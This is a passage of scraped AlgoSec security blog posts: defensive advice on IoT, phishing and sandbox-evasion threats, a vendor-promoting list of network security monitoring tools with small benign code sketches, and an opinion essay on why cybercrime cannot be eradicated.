This process can take time, which is why many incident response teams do not consider suspicious IoT traffic a high-severity issue. IoT endpoints rarely process sensitive data on their own, so it's easy to overlook potential vulnerabilities and even ignore active attacks as long as the organization's mission-critical assets aren't impacted. However, hackers can expand their control over IoT devices and transform them into botnets capable of running denial-of-service attacks. These distributed denial-of-service (DDoS) attacks are much larger and more dangerous, and they are growing in popularity among cybercriminals. Botnet traffic associated with DDoS attacks on IoT networks has increased five-fold over the past year, showing just how promising this avenue is for hackers.
How to protect yourself against IoT infrastructure attacks

Proper network segmentation is vital for preventing IoT infrastructure attacks. Your organization's IoT devices should sit on a network segment that is isolated from the rest of the network, so that even if attackers compromise that entire segment, you are protected from the risk of losing sensitive data from critical business assets. Ideally, this protection will be enforced with a strong set of firewalls managing the connection between your IoT subnetwork and the rest of your network. You may need to create custom rules that take your unique security risk profile and fleet of internet-connected devices into account; there are very few situations in which one-size-fits-all rulemaking works, and this is not one of them.

All IoT devices – no matter how small or insignificant – should be protected by your firewall and other cybersecurity solutions. Never let these devices connect directly to the Internet through an unsecured channel. If they do, they provide attackers with a clear path to circumvent your firewalls and gain access to the rest of your network with ease.

5. Social Engineering and Phishing

Social engineering attacks refer to a broad range of deceptive practices hackers use to gain access to victims' assets. What makes this approach special is that it does not necessarily depend on technical expertise: instead of trying to hack your systems, cybercriminals try to hack your employees and company policies.

Email phishing is one of the most common examples. In a typical phishing attack, hackers may spoof an email server to make it look like they are sending emails from a high-level executive in the company you work for. They can then impersonate this executive and demand junior accountants pay fictitious invoices or send sensitive customer data to email accounts controlled by threat actors.
Other forms of social engineering can turn your organization's tech support line against itself. Attackers may pretend to represent large customer accounts and leverage this ruse to gain information about how your company works, or impersonate a third-party vendor and request confidential information that the vendor would normally have access to. These attacks span the range from simple trickery to elaborate confidence scams. Protecting against them can be incredibly challenging, and your firewall capabilities can make a significant difference in your overall state of readiness.

How to protect yourself against social engineering attacks

Employee training is the top priority for protecting against social engineering attacks. When employees understand the company's operating procedures and security policies, it's much harder for social engineers to trick them. Ideally, training should also include in-depth examples of how phishing attacks work, what they look like, and what steps employees should take when contacted by people they don't trust.

6. Sandbox Exploits

Many organizations use sandbox solutions to prevent file-based malware attacks. Sandboxes work by taking suspicious files and email attachments and opening them in a secure virtual environment before releasing them to users. The sandbox solution observes how the file behaves and quarantines any file that shows malicious activity. In theory, this provides a powerful layer of defense against file-based attacks. In practice, cybercriminals are well aware of how to bypass these solutions. For example, many sandbox solutions can't open files over a certain size, so hackers who attach malicious code to large files can easily get through. Additionally, many forms of malware do not start executing malicious tasks the moment they are activated; this delay can provide just enough of a buffer to get through a sandbox system.
Some sophisticated forms of malware can even detect when they are being run in a sandbox environment – and will play the part of an innocent program until they are let loose inside the network.

How to protect yourself against sandbox exploits

Many next-generation firewalls include cloud-enabled sandboxing capable of running programs of arbitrary size for a potentially unlimited amount of time. More sophisticated sandbox solutions go to great lengths to mimic the system specifications of an actual endpoint so malware won't know it is being run in a virtual environment. Organizations may also be able to overcome the limitations of the sandbox approach using Content Disarm and Reconstruction (CDR) techniques. This approach keeps potentially malicious files off the network entirely and only allows a reconstructed version of the file to enter the network. Since the new file is built from scratch, it will not contain any malware that may have been attached to the original file.

Prevent firewall breaches with AlgoSec

Managing firewalls manually can be overwhelming and time-consuming – especially when dealing with multiple firewall solutions. With the help of a firewall management solution, you can easily configure firewall rules and manage configurations from a single dashboard. AlgoSec's firewall management solution integrates with your firewalls to deliver unified firewall policy management from a single location, streamlining the entire process. With AlgoSec, you can maintain clear visibility of your firewall ruleset, automate the management process, assess risk and optimize rulesets, streamline audit preparation and ensure compliance, and access many features through web service APIs.
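The outbound DNS inspection recommended under tactic 1 above can be sketched as a simple classification step (the domains and policy tiers here are hypothetical, and real firewalls would combine this with reputation feeds and identity-based checks):

```python
# Hypothetical sketch of outbound DNS inspection: classify each queried
# domain as blocked, allowed, monitored, or alert-worthy.
TRUSTED = {"example.com", "training.example.net"}   # vetted destinations
KNOWN_BAD = {"malware-host.example.org"}            # known malicious servers

def classify_dns_query(domain, seen):
    """Return 'block', 'allow', 'monitor', or 'alert' for one outbound query."""
    if domain in KNOWN_BAD:
        return "block"      # known malware hosting: block entirely
    if domain in TRUSTED:
        return "allow"
    if domain in seen:
        return "monitor"    # unvetted but previously seen: watch closely
    seen.add(domain)
    return "alert"          # first contact with an unknown domain

seen = set()
print(classify_dns_query("example.com", seen))           # allow
print(classify_dns_query("new-site.example.io", seen))   # alert
print(classify_dns_query("new-site.example.io", seen))   # monitor
```

The point of the sketch is the policy shape, not the lists themselves: block known-bad destinations outright, and treat first contact with an unknown domain as more suspicious than repeated contact with one you are already watching.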

  • AlgoSec | Top 9 Network Security Monitoring Tools for Identifying Potential Threats

Top 9 Network Security Monitoring Tools for Identifying Potential Threats Tsippi Dach · 2 min read · Published 2/4/24

What is Network Security Monitoring?

Network security monitoring is the process of inspecting network traffic and IT infrastructure for signs of security issues. These signs can provide IT teams with valuable information about the organization's cybersecurity posture. For example, security teams may notice unusual changes being made to access control policies, leading to unexpected traffic flows between on-premises systems and unrecognized web applications. This might provide early warning of an active cyberattack, giving security teams enough time to conduct remediation efforts and prevent data loss. Detecting this kind of suspicious activity without the visibility that network security monitoring provides would be very difficult.

These tools and policies enhance operational security by enabling network intrusion detection, anomaly detection, and signature-based detection. Full-featured network security monitoring solutions also help organizations meet regulatory compliance requirements by maintaining records of network activity and security incidents. This gives analysts valuable data for conducting investigations into security events and connecting seemingly unrelated incidents into a coherent timeline.

What To Evaluate in a Network Monitoring Software Provider

Your network monitoring software provider should offer a comprehensive set of features for collecting, analyzing, and responding to suspicious activity anywhere on your network.
It should unify management and control of your organization's IT assets while providing full visibility into how they interact with one another.

Comprehensive alerting and reporting

Your network monitoring solution must notify you of security incidents in real time and provide detailed reports describing those incidents. It should include multiple toolsets for collecting performance metrics, conducting in-depth analysis, and generating compliance reports.

Future-proof scalability

Consider what kind of network monitoring needs your organization might have several years from now. If your monitoring tool cannot scale to accommodate that growth, you may end up locked into a vendor agreement that doesn't align with your interests. This is especially true with vendors that prioritize on-premises implementations, since you run the risk of paying for equipment and services you don't actually use. Cloud-delivered software solutions often perform better in use cases where flexibility is important.

Integration with your existing IT infrastructure

Your existing security tech stack may include a selection of SIEM platforms, IDS/IPS systems, firewalls, and endpoint security solutions. Your network security monitoring software will need to connect all of these tools and platforms together in order to grant visibility into the network traffic flows between them. Misconfigurations and improper integrations can result in dangerous security vulnerabilities; a high-performance vulnerability scanning solution may be able to detect these misconfigurations so you can fix them proactively.

Intuitive user experience for security teams and IT admins

Complex tools often come with complex management requirements. This can create a production bottleneck when there aren't enough fully trained analysts on the IT security team.
Monitoring tools designed for ease of use can improve security performance by reducing training costs and allowing team members to access monitoring insights more easily. Highly automated tools can drive even greater performance benefits by reducing the need for manual control altogether.

Excellent support and documentation

Deploying network security monitoring tools is not always a straightforward task. Most organizations will need to rely on expert support to assist with implementation, troubleshooting, and ongoing maintenance. Some vendors provide better technical support than others, and this difference is often reflected in the price. Some organizations work with managed service providers who can offset part of their support and documentation needs by providing on-demand expertise.

Pricing structures that work for you

Different vendors have different pricing structures. When comparing network monitoring tools, consider the total cost of ownership, including licensing fees, hardware requirements, and any additional costs for support or updates. Certain usage models will fit your organization's needs better than others, and you'll have to document them carefully to avoid overpaying.

Compliance and reporting capabilities

If you need to meet compliance requirements, you will need a network security monitoring tool that can generate the necessary reports and logs. Every set of standards is different, but many reputable vendors offer solutions for meeting specific compliance criteria. Find out if your network security monitoring vendor supports compliance standards like PCI DSS, HIPAA, and NIST.

A good reputation for customer success

Research the reputation and track record of every vendor you could potentially work with. Every vendor will tell you that they are the best – ask for evidence to back up their claims.
Vendors with high renewal rates are much more likely to provide you with valuable security technology than lower-priced competitors with significant customer churn. Pay close attention to reviews and testimonials from independent, trustworthy sources.

Compatibility with network infrastructure

Your network security monitoring tool must be compatible with the entirety of your network infrastructure. At the most basic level, it must integrate with your hardware fleet of routers, switches, and endpoint devices. If you use devices with non-compatible operating systems, you risk introducing blind spots into your security posture. For the best results, you need in-depth observability for every hardware and software asset in your network, from the physical layer to the application layer.

Regular updates and maintenance

Updates are essential to keep security tools effective against evolving threats. Check the update frequency of any monitoring tool you consider implementing, and look at the specific security vulnerabilities addressed in those updates. If there is a significant delay between the public announcement of new vulnerabilities and the corresponding security patch, your monitoring tools may be vulnerable during that window.

9 Best Network Security Monitoring Providers for Identifying Cybersecurity Threats

1. AlgoSec

AlgoSec is a network security policy management solution that helps organizations automate and orchestrate network security policies. It keeps firewall rules, routers, and other security devices configured correctly, ensuring network assets are secured properly. AlgoSec protects organizations from misconfigurations that can lead to malware, ransomware, and phishing attacks, and gives security teams the ability to proactively simulate changes to their IT infrastructure.

2. SolarWinds

SolarWinds offers a range of network management and monitoring solutions, including network security monitoring tools that detect changes to security policies and traffic flows. It provides tools for network visibility and helps identify and respond to security incidents. However, SolarWinds can be difficult for some organizations to deploy, because customers must purchase additional on-premises hardware.

3. Security Onion

Security Onion is an open-source Linux distribution designed for network security monitoring. It integrates multiple monitoring tools like Snort, Suricata, Zeek, and others into a single platform, making it easier to set up and manage a comprehensive network security monitoring solution. As an open-source option, it is one of the most cost-effective solutions on the market, but it may require additional development resources to customize effectively for your organization's needs.

4. ELK Stack

Elastic's ELK Stack is a combination of three open-source tools: Elasticsearch, Logstash, and Kibana. It's commonly used for log data and event analysis. You can use it to centralize logs, perform real-time analysis, and create dashboards for network security monitoring. The toolset provides high-quality correlation across large data sets and gives security teams significant opportunities to improve security and network performance using automation.

5. Cisco Stealthwatch

Cisco Stealthwatch is a commercial network traffic analysis and monitoring solution. It uses NetFlow and other data sources to detect and respond to security threats, monitor network behavior, and provide visibility into your network traffic. It's a highly effective solution for network traffic analysis, allowing security analysts to identify threats that have infiltrated network assets before they get a chance to do serious damage.

6. Wireshark

Wireshark is a widely used open-source packet analyzer that allows you to capture and analyze network traffic in real time. It can help you identify and troubleshoot network issues and is a valuable tool for security analysts. Unlike other entries on this list, it is not a fully featured monitoring platform that collects and analyzes data at scale; it focuses on providing deep visibility into specific data flows, one at a time.

7. Snort

Snort is an open-source intrusion detection system (IDS) and intrusion prevention system (IPS) that can monitor network traffic for signs of suspicious or malicious activity. It supports customized rulesets, is easy to use, and has a large community of users and contributors. Snort is widely compatible with other security technologies, allowing users to feed in signature updates and add logging capabilities to its basic functionality very easily. However, it is an older technology that doesn't natively support some modern features users may expect.

8. Suricata

Suricata is another open-source IDS/IPS tool that can analyze network traffic for threats. It offers high-performance features and supports Snort-compatible rules, making it a good alternative. Suricata was developed more recently than Snort, which means it supports modern workflow features like multithreading and file extraction. Unlike Snort, Suricata supports application-layer detection rules and can identify traffic on non-standard ports based on the traffic protocol.

9. Zeek (formerly Bro)

Zeek is an open-source network analysis framework that focuses on providing detailed insights into network activity. It can help you detect and analyze potential security incidents and is often used alongside other NSM tools. Zeek helps security analysts categorize and model network traffic by protocol, making it easier to inspect large volumes of data.
Like Suricata, it runs on the application layer and can differentiate between protocols.

Essential Network Monitoring Features

Traffic Analysis
The ability to capture, analyze, and decode network traffic in real time is basic functionality all network security monitoring tools should share. Ideally, a tool should also support a wide range of network protocols and let users categorize traffic by protocol.

Alerts and Notifications
A monitoring tool should provide reliable alerts and notifications for suspicious network activity, enabling timely response to security threats. To avoid overwhelming analysts with data and contributing to alert fatigue, these notifications should be consolidated with data from the other tools in your security tech stack.

Log Management
Your network monitoring tool should contribute to centralized management of logs from network devices, applications, and security sensors for easy correlation and analysis. This is best achieved by integrating a SIEM platform into your tech stack, though you may not wish to store all of your network's logs on the SIEM because of the added expense.

Threat Detection
Unlike regular network traffic monitoring, network security monitoring focuses on indicators of compromise in network activity. Your tool should use a combination of signature-based detection, anomaly detection, and behavioral analysis to identify potential security threats.

Incident Response Support
Your network monitoring solution should facilitate the investigation of security incidents by providing contextual information, historical data, and forensic capabilities. It may correlate detected security events so that analysts can conduct investigations more rapidly, and improve security outcomes by reducing false positives.

Network Visibility
Best-in-class network security monitoring tools offer insights into network traffic patterns, device interactions, and potential blind spots to enhance network monitoring and troubleshooting.
To do this, they must connect with every asset on the network and successfully observe data transfers between those assets.

Integration
No single security tool can be trusted to do everything on its own. Your network security monitoring platform must integrate with other security solutions, such as firewalls, intrusion detection/prevention systems (IDS/IPS), and SIEM platforms, to create a comprehensive security ecosystem. If one tool fails to detect malicious activity, another may succeed.

Customization
No two organizations are the same. The best network monitoring solutions allow users to customize rules, alerts, and policies to align with specific security requirements and network environments. These customizations help security teams reduce alert fatigue and focus their efforts on the most important traffic flows on the network.

Advanced Features for Identifying Vulnerabilities & Weaknesses

Threat Intelligence Integration
Threat intelligence feeds enhance threat detection and response capabilities by providing in-depth information about the tactics, techniques, and procedures used by threat actors. These feeds update constantly to reflect the latest cybercriminal activity, so analysts always have current data.

Forensic Capabilities
Detailed data and forensic tools support in-depth analysis of security breaches and related incidents, allowing analysts to attribute attacks to specific actors and discover the full extent of a cyberattack. With retroactive forensics, investigators can include historical network data and look for evidence of past compromise.

Automated Response
Automated responses to security threats can isolate affected devices or modify firewall rules the moment malicious behavior is detected. Automated detection and response workflows must be carefully configured to avoid business disruptions caused by misconfigured rules repeatedly denying legitimate traffic.
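The automated-response pattern described above can be sketched in a few lines. The following is a minimal illustration; the alert format, the threshold, and the rule syntax are all hypothetical, not any vendor's API:

```python
# Minimal sketch of an automated-response rule: when an alert for a host
# crosses a severity threshold, emit a firewall "deny" rule for that host.
# The alert format and rule syntax are illustrative only; a real
# deployment would call your firewall's management API instead.

SEVERITY_THRESHOLD = 7  # alerts scored 0-10; act at 7 or above

def respond_to_alert(alert):
    """Return a firewall rule string if the alert warrants isolation."""
    if alert.get("severity", 0) < SEVERITY_THRESHOLD:
        return None  # below threshold: log only, avoid disrupting business
    src = alert["source_ip"]
    # Deny all traffic from the suspicious host pending human review.
    return "deny ip from {} to any".format(src)

print(respond_to_alert({"source_ip": "10.0.0.42", "severity": 9}))
```

The guard clause is the point: the careful-configuration caveat above is exactly why the threshold and the scope of the generated rule deserve review before such a workflow runs unattended.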
Application-level Visibility
Some network security monitoring tools can identify and classify network traffic by application and service, enabling granular control and monitoring. This makes it easier for analysts to categorize traffic by protocol, which can streamline investigations into attacks that take place on the application layer.

Cloud and Virtual Network Support
Cloud-enabled organizations need monitoring capabilities that cover cloud environments and virtualized networks. Without visibility into these parts of the hybrid network, security vulnerabilities may go unnoticed. Cloud-native network monitoring tools must include data on public and private cloud instances as well as containerized assets.

Machine Learning and AI
Advanced machine learning and artificial intelligence algorithms can improve threat detection accuracy and reduce false positives. These features often work by examining large-scale network traffic data and identifying patterns within the dataset. Different vendors have different AI models and varying levels of maturity with emerging AI technology.

User and Entity Behavior Analytics (UEBA)
UEBA platforms monitor asset behavior to detect insider threats and compromised accounts. This advanced feature allows analysts to assign dynamic risk scores to authenticated users and assets, triggering alerts when their activities deviate too far from their established routine.

Threat Hunting Tools
Network monitoring tools can provide extra features and workflows for proactive threat hunting and security analysis. These tools may match observed behaviors against known indicators of compromise, or match observed traffic patterns against the tactics, techniques, and procedures of known threat actors.

AlgoSec: The Preferred Network Security Monitoring Solution
AlgoSec has earned an impressive reputation for its network security policy management capabilities.
The platform empowers security analysts and IT administrators to manage and optimize network security policies effectively. It includes comprehensive firewall policy and change management capabilities, along with solutions for automating application connectivity across the hybrid network. Here are some reasons why IT leaders choose AlgoSec as their preferred network security policy management solution:

Policy Optimization: AlgoSec can analyze firewall rules and network security policies to identify redundant or conflicting rules, helping organizations optimize their security posture and improve rule efficiency.

Change Management: It offers tools for tracking and managing changes to firewall and network policies, ensuring that changes are made in a controlled and compliant manner.

Risk Assessment: AlgoSec can assess the potential security risks associated with firewall rule changes before they are implemented, helping organizations make informed decisions.

Compliance Reporting: It provides reports and dashboards that assist with compliance audits, making it easier to demonstrate compliance to regulators.

Automation: AlgoSec offers automation capabilities to streamline policy management tasks, reducing the risk of human error and improving operational efficiency.

Visibility: It provides visibility into network traffic and policy changes, helping security teams monitor and respond to potential security incidents.
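To make the rule-redundancy idea behind policy optimization concrete, here is a minimal sketch of one such check. This is not AlgoSec's actual algorithm, and the rule format is invented for the example: a rule is flagged as shadowed when an earlier rule already matches a superset of its traffic, so the later rule can never fire.

```python
# Illustrative shadowed-rule check: a later rule is redundant if an
# earlier rule in the ordered policy matches every packet it matches.
# The rule dictionaries below are a made-up format for this sketch.
import ipaddress

def covers(rule_a, rule_b):
    """True if rule_a matches every packet that rule_b matches."""
    net_a = ipaddress.ip_network(rule_a["src"])
    net_b = ipaddress.ip_network(rule_b["src"])
    return net_b.subnet_of(net_a) and rule_a["port"] in ("any", rule_b["port"])

def find_shadowed(rules):
    """Return indices of rules fully covered by an earlier rule."""
    return [
        j for j, later in enumerate(rules)
        if any(covers(earlier, later) for earlier in rules[:j])
    ]

rules = [
    {"src": "10.0.0.0/8", "port": "any", "action": "deny"},
    {"src": "10.1.2.0/24", "port": "443", "action": "deny"},   # shadowed
    {"src": "192.168.0.0/16", "port": "22", "action": "allow"},
]
print(find_shadowed(rules))  # -> [1]
```

A production analyzer would also compare actions (a broad deny shadowing a narrow allow is a conflict, not mere redundancy) and handle destination addresses and protocols, but the subset test above is the core of the technique.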

  • AlgoSec | Errare humanum est

Cloud Security
Errare humanum est
Rony Moshkovich · 2 min read
Published 11/25/21

Nick Ellsmore is an Australian cybersecurity professional whose thoughts on the future of cybersecurity are always insightful. Having deep respect for Nick, I really enjoyed listening to his latest podcast, "Episode 79: Making the cyber sector redundant with Nick Ellsmore". As Nick opened the door to debate on "all the mildly controversial views" he put forward in the podcast, I decided to take a stab at a couple of his points. For some mysterious reason, these points touched a nerve. So, here we go.

Nick: The cybersecurity industry, we spent so long trying to get people to listen to us and take the issue seriously, you know, we're now getting that, you know.

Are businesses really responding because we were trying to get people to listen to us? Let me rephrase this question: are businesses really spending more on cybersecurity because we were trying to get people to listen to us? The "cynical me" says no. Businesses are spending more on cybersecurity because they are losing more to cyber incidents. It's not the number of incidents; it's their impact that is increasingly becoming devastating. Over the last ten years, there were plenty of front-page headliners that shattered even seemingly unshakable businesses and government bodies. Think of the Target attack in 2013, the Bank of Bangladesh heist in 2016, the Equifax breach in 2017, the SolarWinds hack in 2020... the list goes on. We all know how Uber tried to bribe attackers to sweep the stolen customer data under the rug.
But how many companies have succeeded in doing so without being caught? How many cyber incidents have never been disclosed?

These headliners don't stop. Each of them is another reputational blow: impacted stock prices, rolled heads, stressed-out PR teams trying to play down the issue, knee-jerk acquisitions of snake-oil-selling startups, and so on. We're not even talking about skewed election results (a topic for another discussion). Each one of them comes at a considerable cost. So no wonder many geniuses now realise that spending on cybersecurity can actually mitigate those risks. It's not our perseverance that finally started paying off. It's their pockets that started hurting.

Nick: I think it's important that we don't lose sight of the fact that this is actually a bad thing to have to spend money on. Like, the reason that we're doing this is not healthy. ... no one gets up in the morning and says, wow, I can't wait to, you know, put better locks on my doors.

It's not locks we sell. We sell gym membership. We want people to do something now to stop bad things from happening in the future. It's a concept of hygiene, insurance, prevention, health checks. People are free not to pursue these steps and run their businesses the way they used to... until they get hacked, make the front page, wonder first "Why me?", and then appoint a scapegoat.

Nick: And so I think we need to remember that, in a sense, our job is to create the entire redundancy of this sector. Like, if we actually do our job well, then we all have to go and do something else, because security is no longer an issue.

It won't happen, for two main reasons.

Émile Durkheim believed in a "society of saints". Unfortunately, it is a utopia. Greed, hunger, jealousy, and poverty are the never-ending satellites of the human race that will constantly fuel crime. Some are induced by wars, some by corrupt regimes, some by sanctions, some by imperfect laws.
But in the end, there will always be Haves and Have-Nots, and therefore fundamental inequality. And that will feed crime.

"Errare humanum est", Seneca. To err is human.

Because of human error, there will always be vulnerabilities in code. Because of human nature (and its derivatives: geopolitical and religious tension, domination, competition, nationalism, the fight for resources), there will always be people willing to exploit those vulnerabilities, and capable of it. Mix those two ingredients and you get a perfect recipe for cybercrime. Multiply that by never-ending computerisation, automation, and digital transformation, and you get a constantly growing attack surface. No matter how well we do our job, we can only control cybercrime and keep a lid on it; we can't eradicate it. Thinking we could would be utopian.

Another important consideration is budget constraints. Building proper security is never fun: it's a tedious process that burns cash but produces no tangible outcome. Imagine a project with an allocated budget B to build a product P with a feature set F in a timeframe T. Quite often, such a project will be underfinanced, potentially leading to a poor choice of coders, overcommitted promises, and unrealistic expectations. Eventually leading to this (oldie, but goldie):

Add cybersecurity to this picture, and you get an extra step that seemingly complicates everything even further:

The project's investors will undoubtedly question why that extra step was needed. Is there a new feature that no one else has? A unique solution to an old problem? None of that? Then what's the justification for such over-complication? Planning for cybersecurity to be built in is often perceived as FUD. If it's not tangible, why do we need it? Customers won't see it. No one will see it. Scary stories in the press? Nah, that'll never happen to us. In some ways, extra budgeting for cybersecurity is anti-capitalistic in nature.
It increases the product's cost and therefore its price, making it less competitive. It defeats the purpose of outsourcing product development, often making outsourcing impossible. From the business point of view, putting "Sec" into "DevOps" does not make sense. That's OK. No need... until it all gloriously hits the fan, and then we go back to step 1. Then, maybe, just maybe, the customer will say, "If we had budgeted for that extra step, maybe we would have been better off."
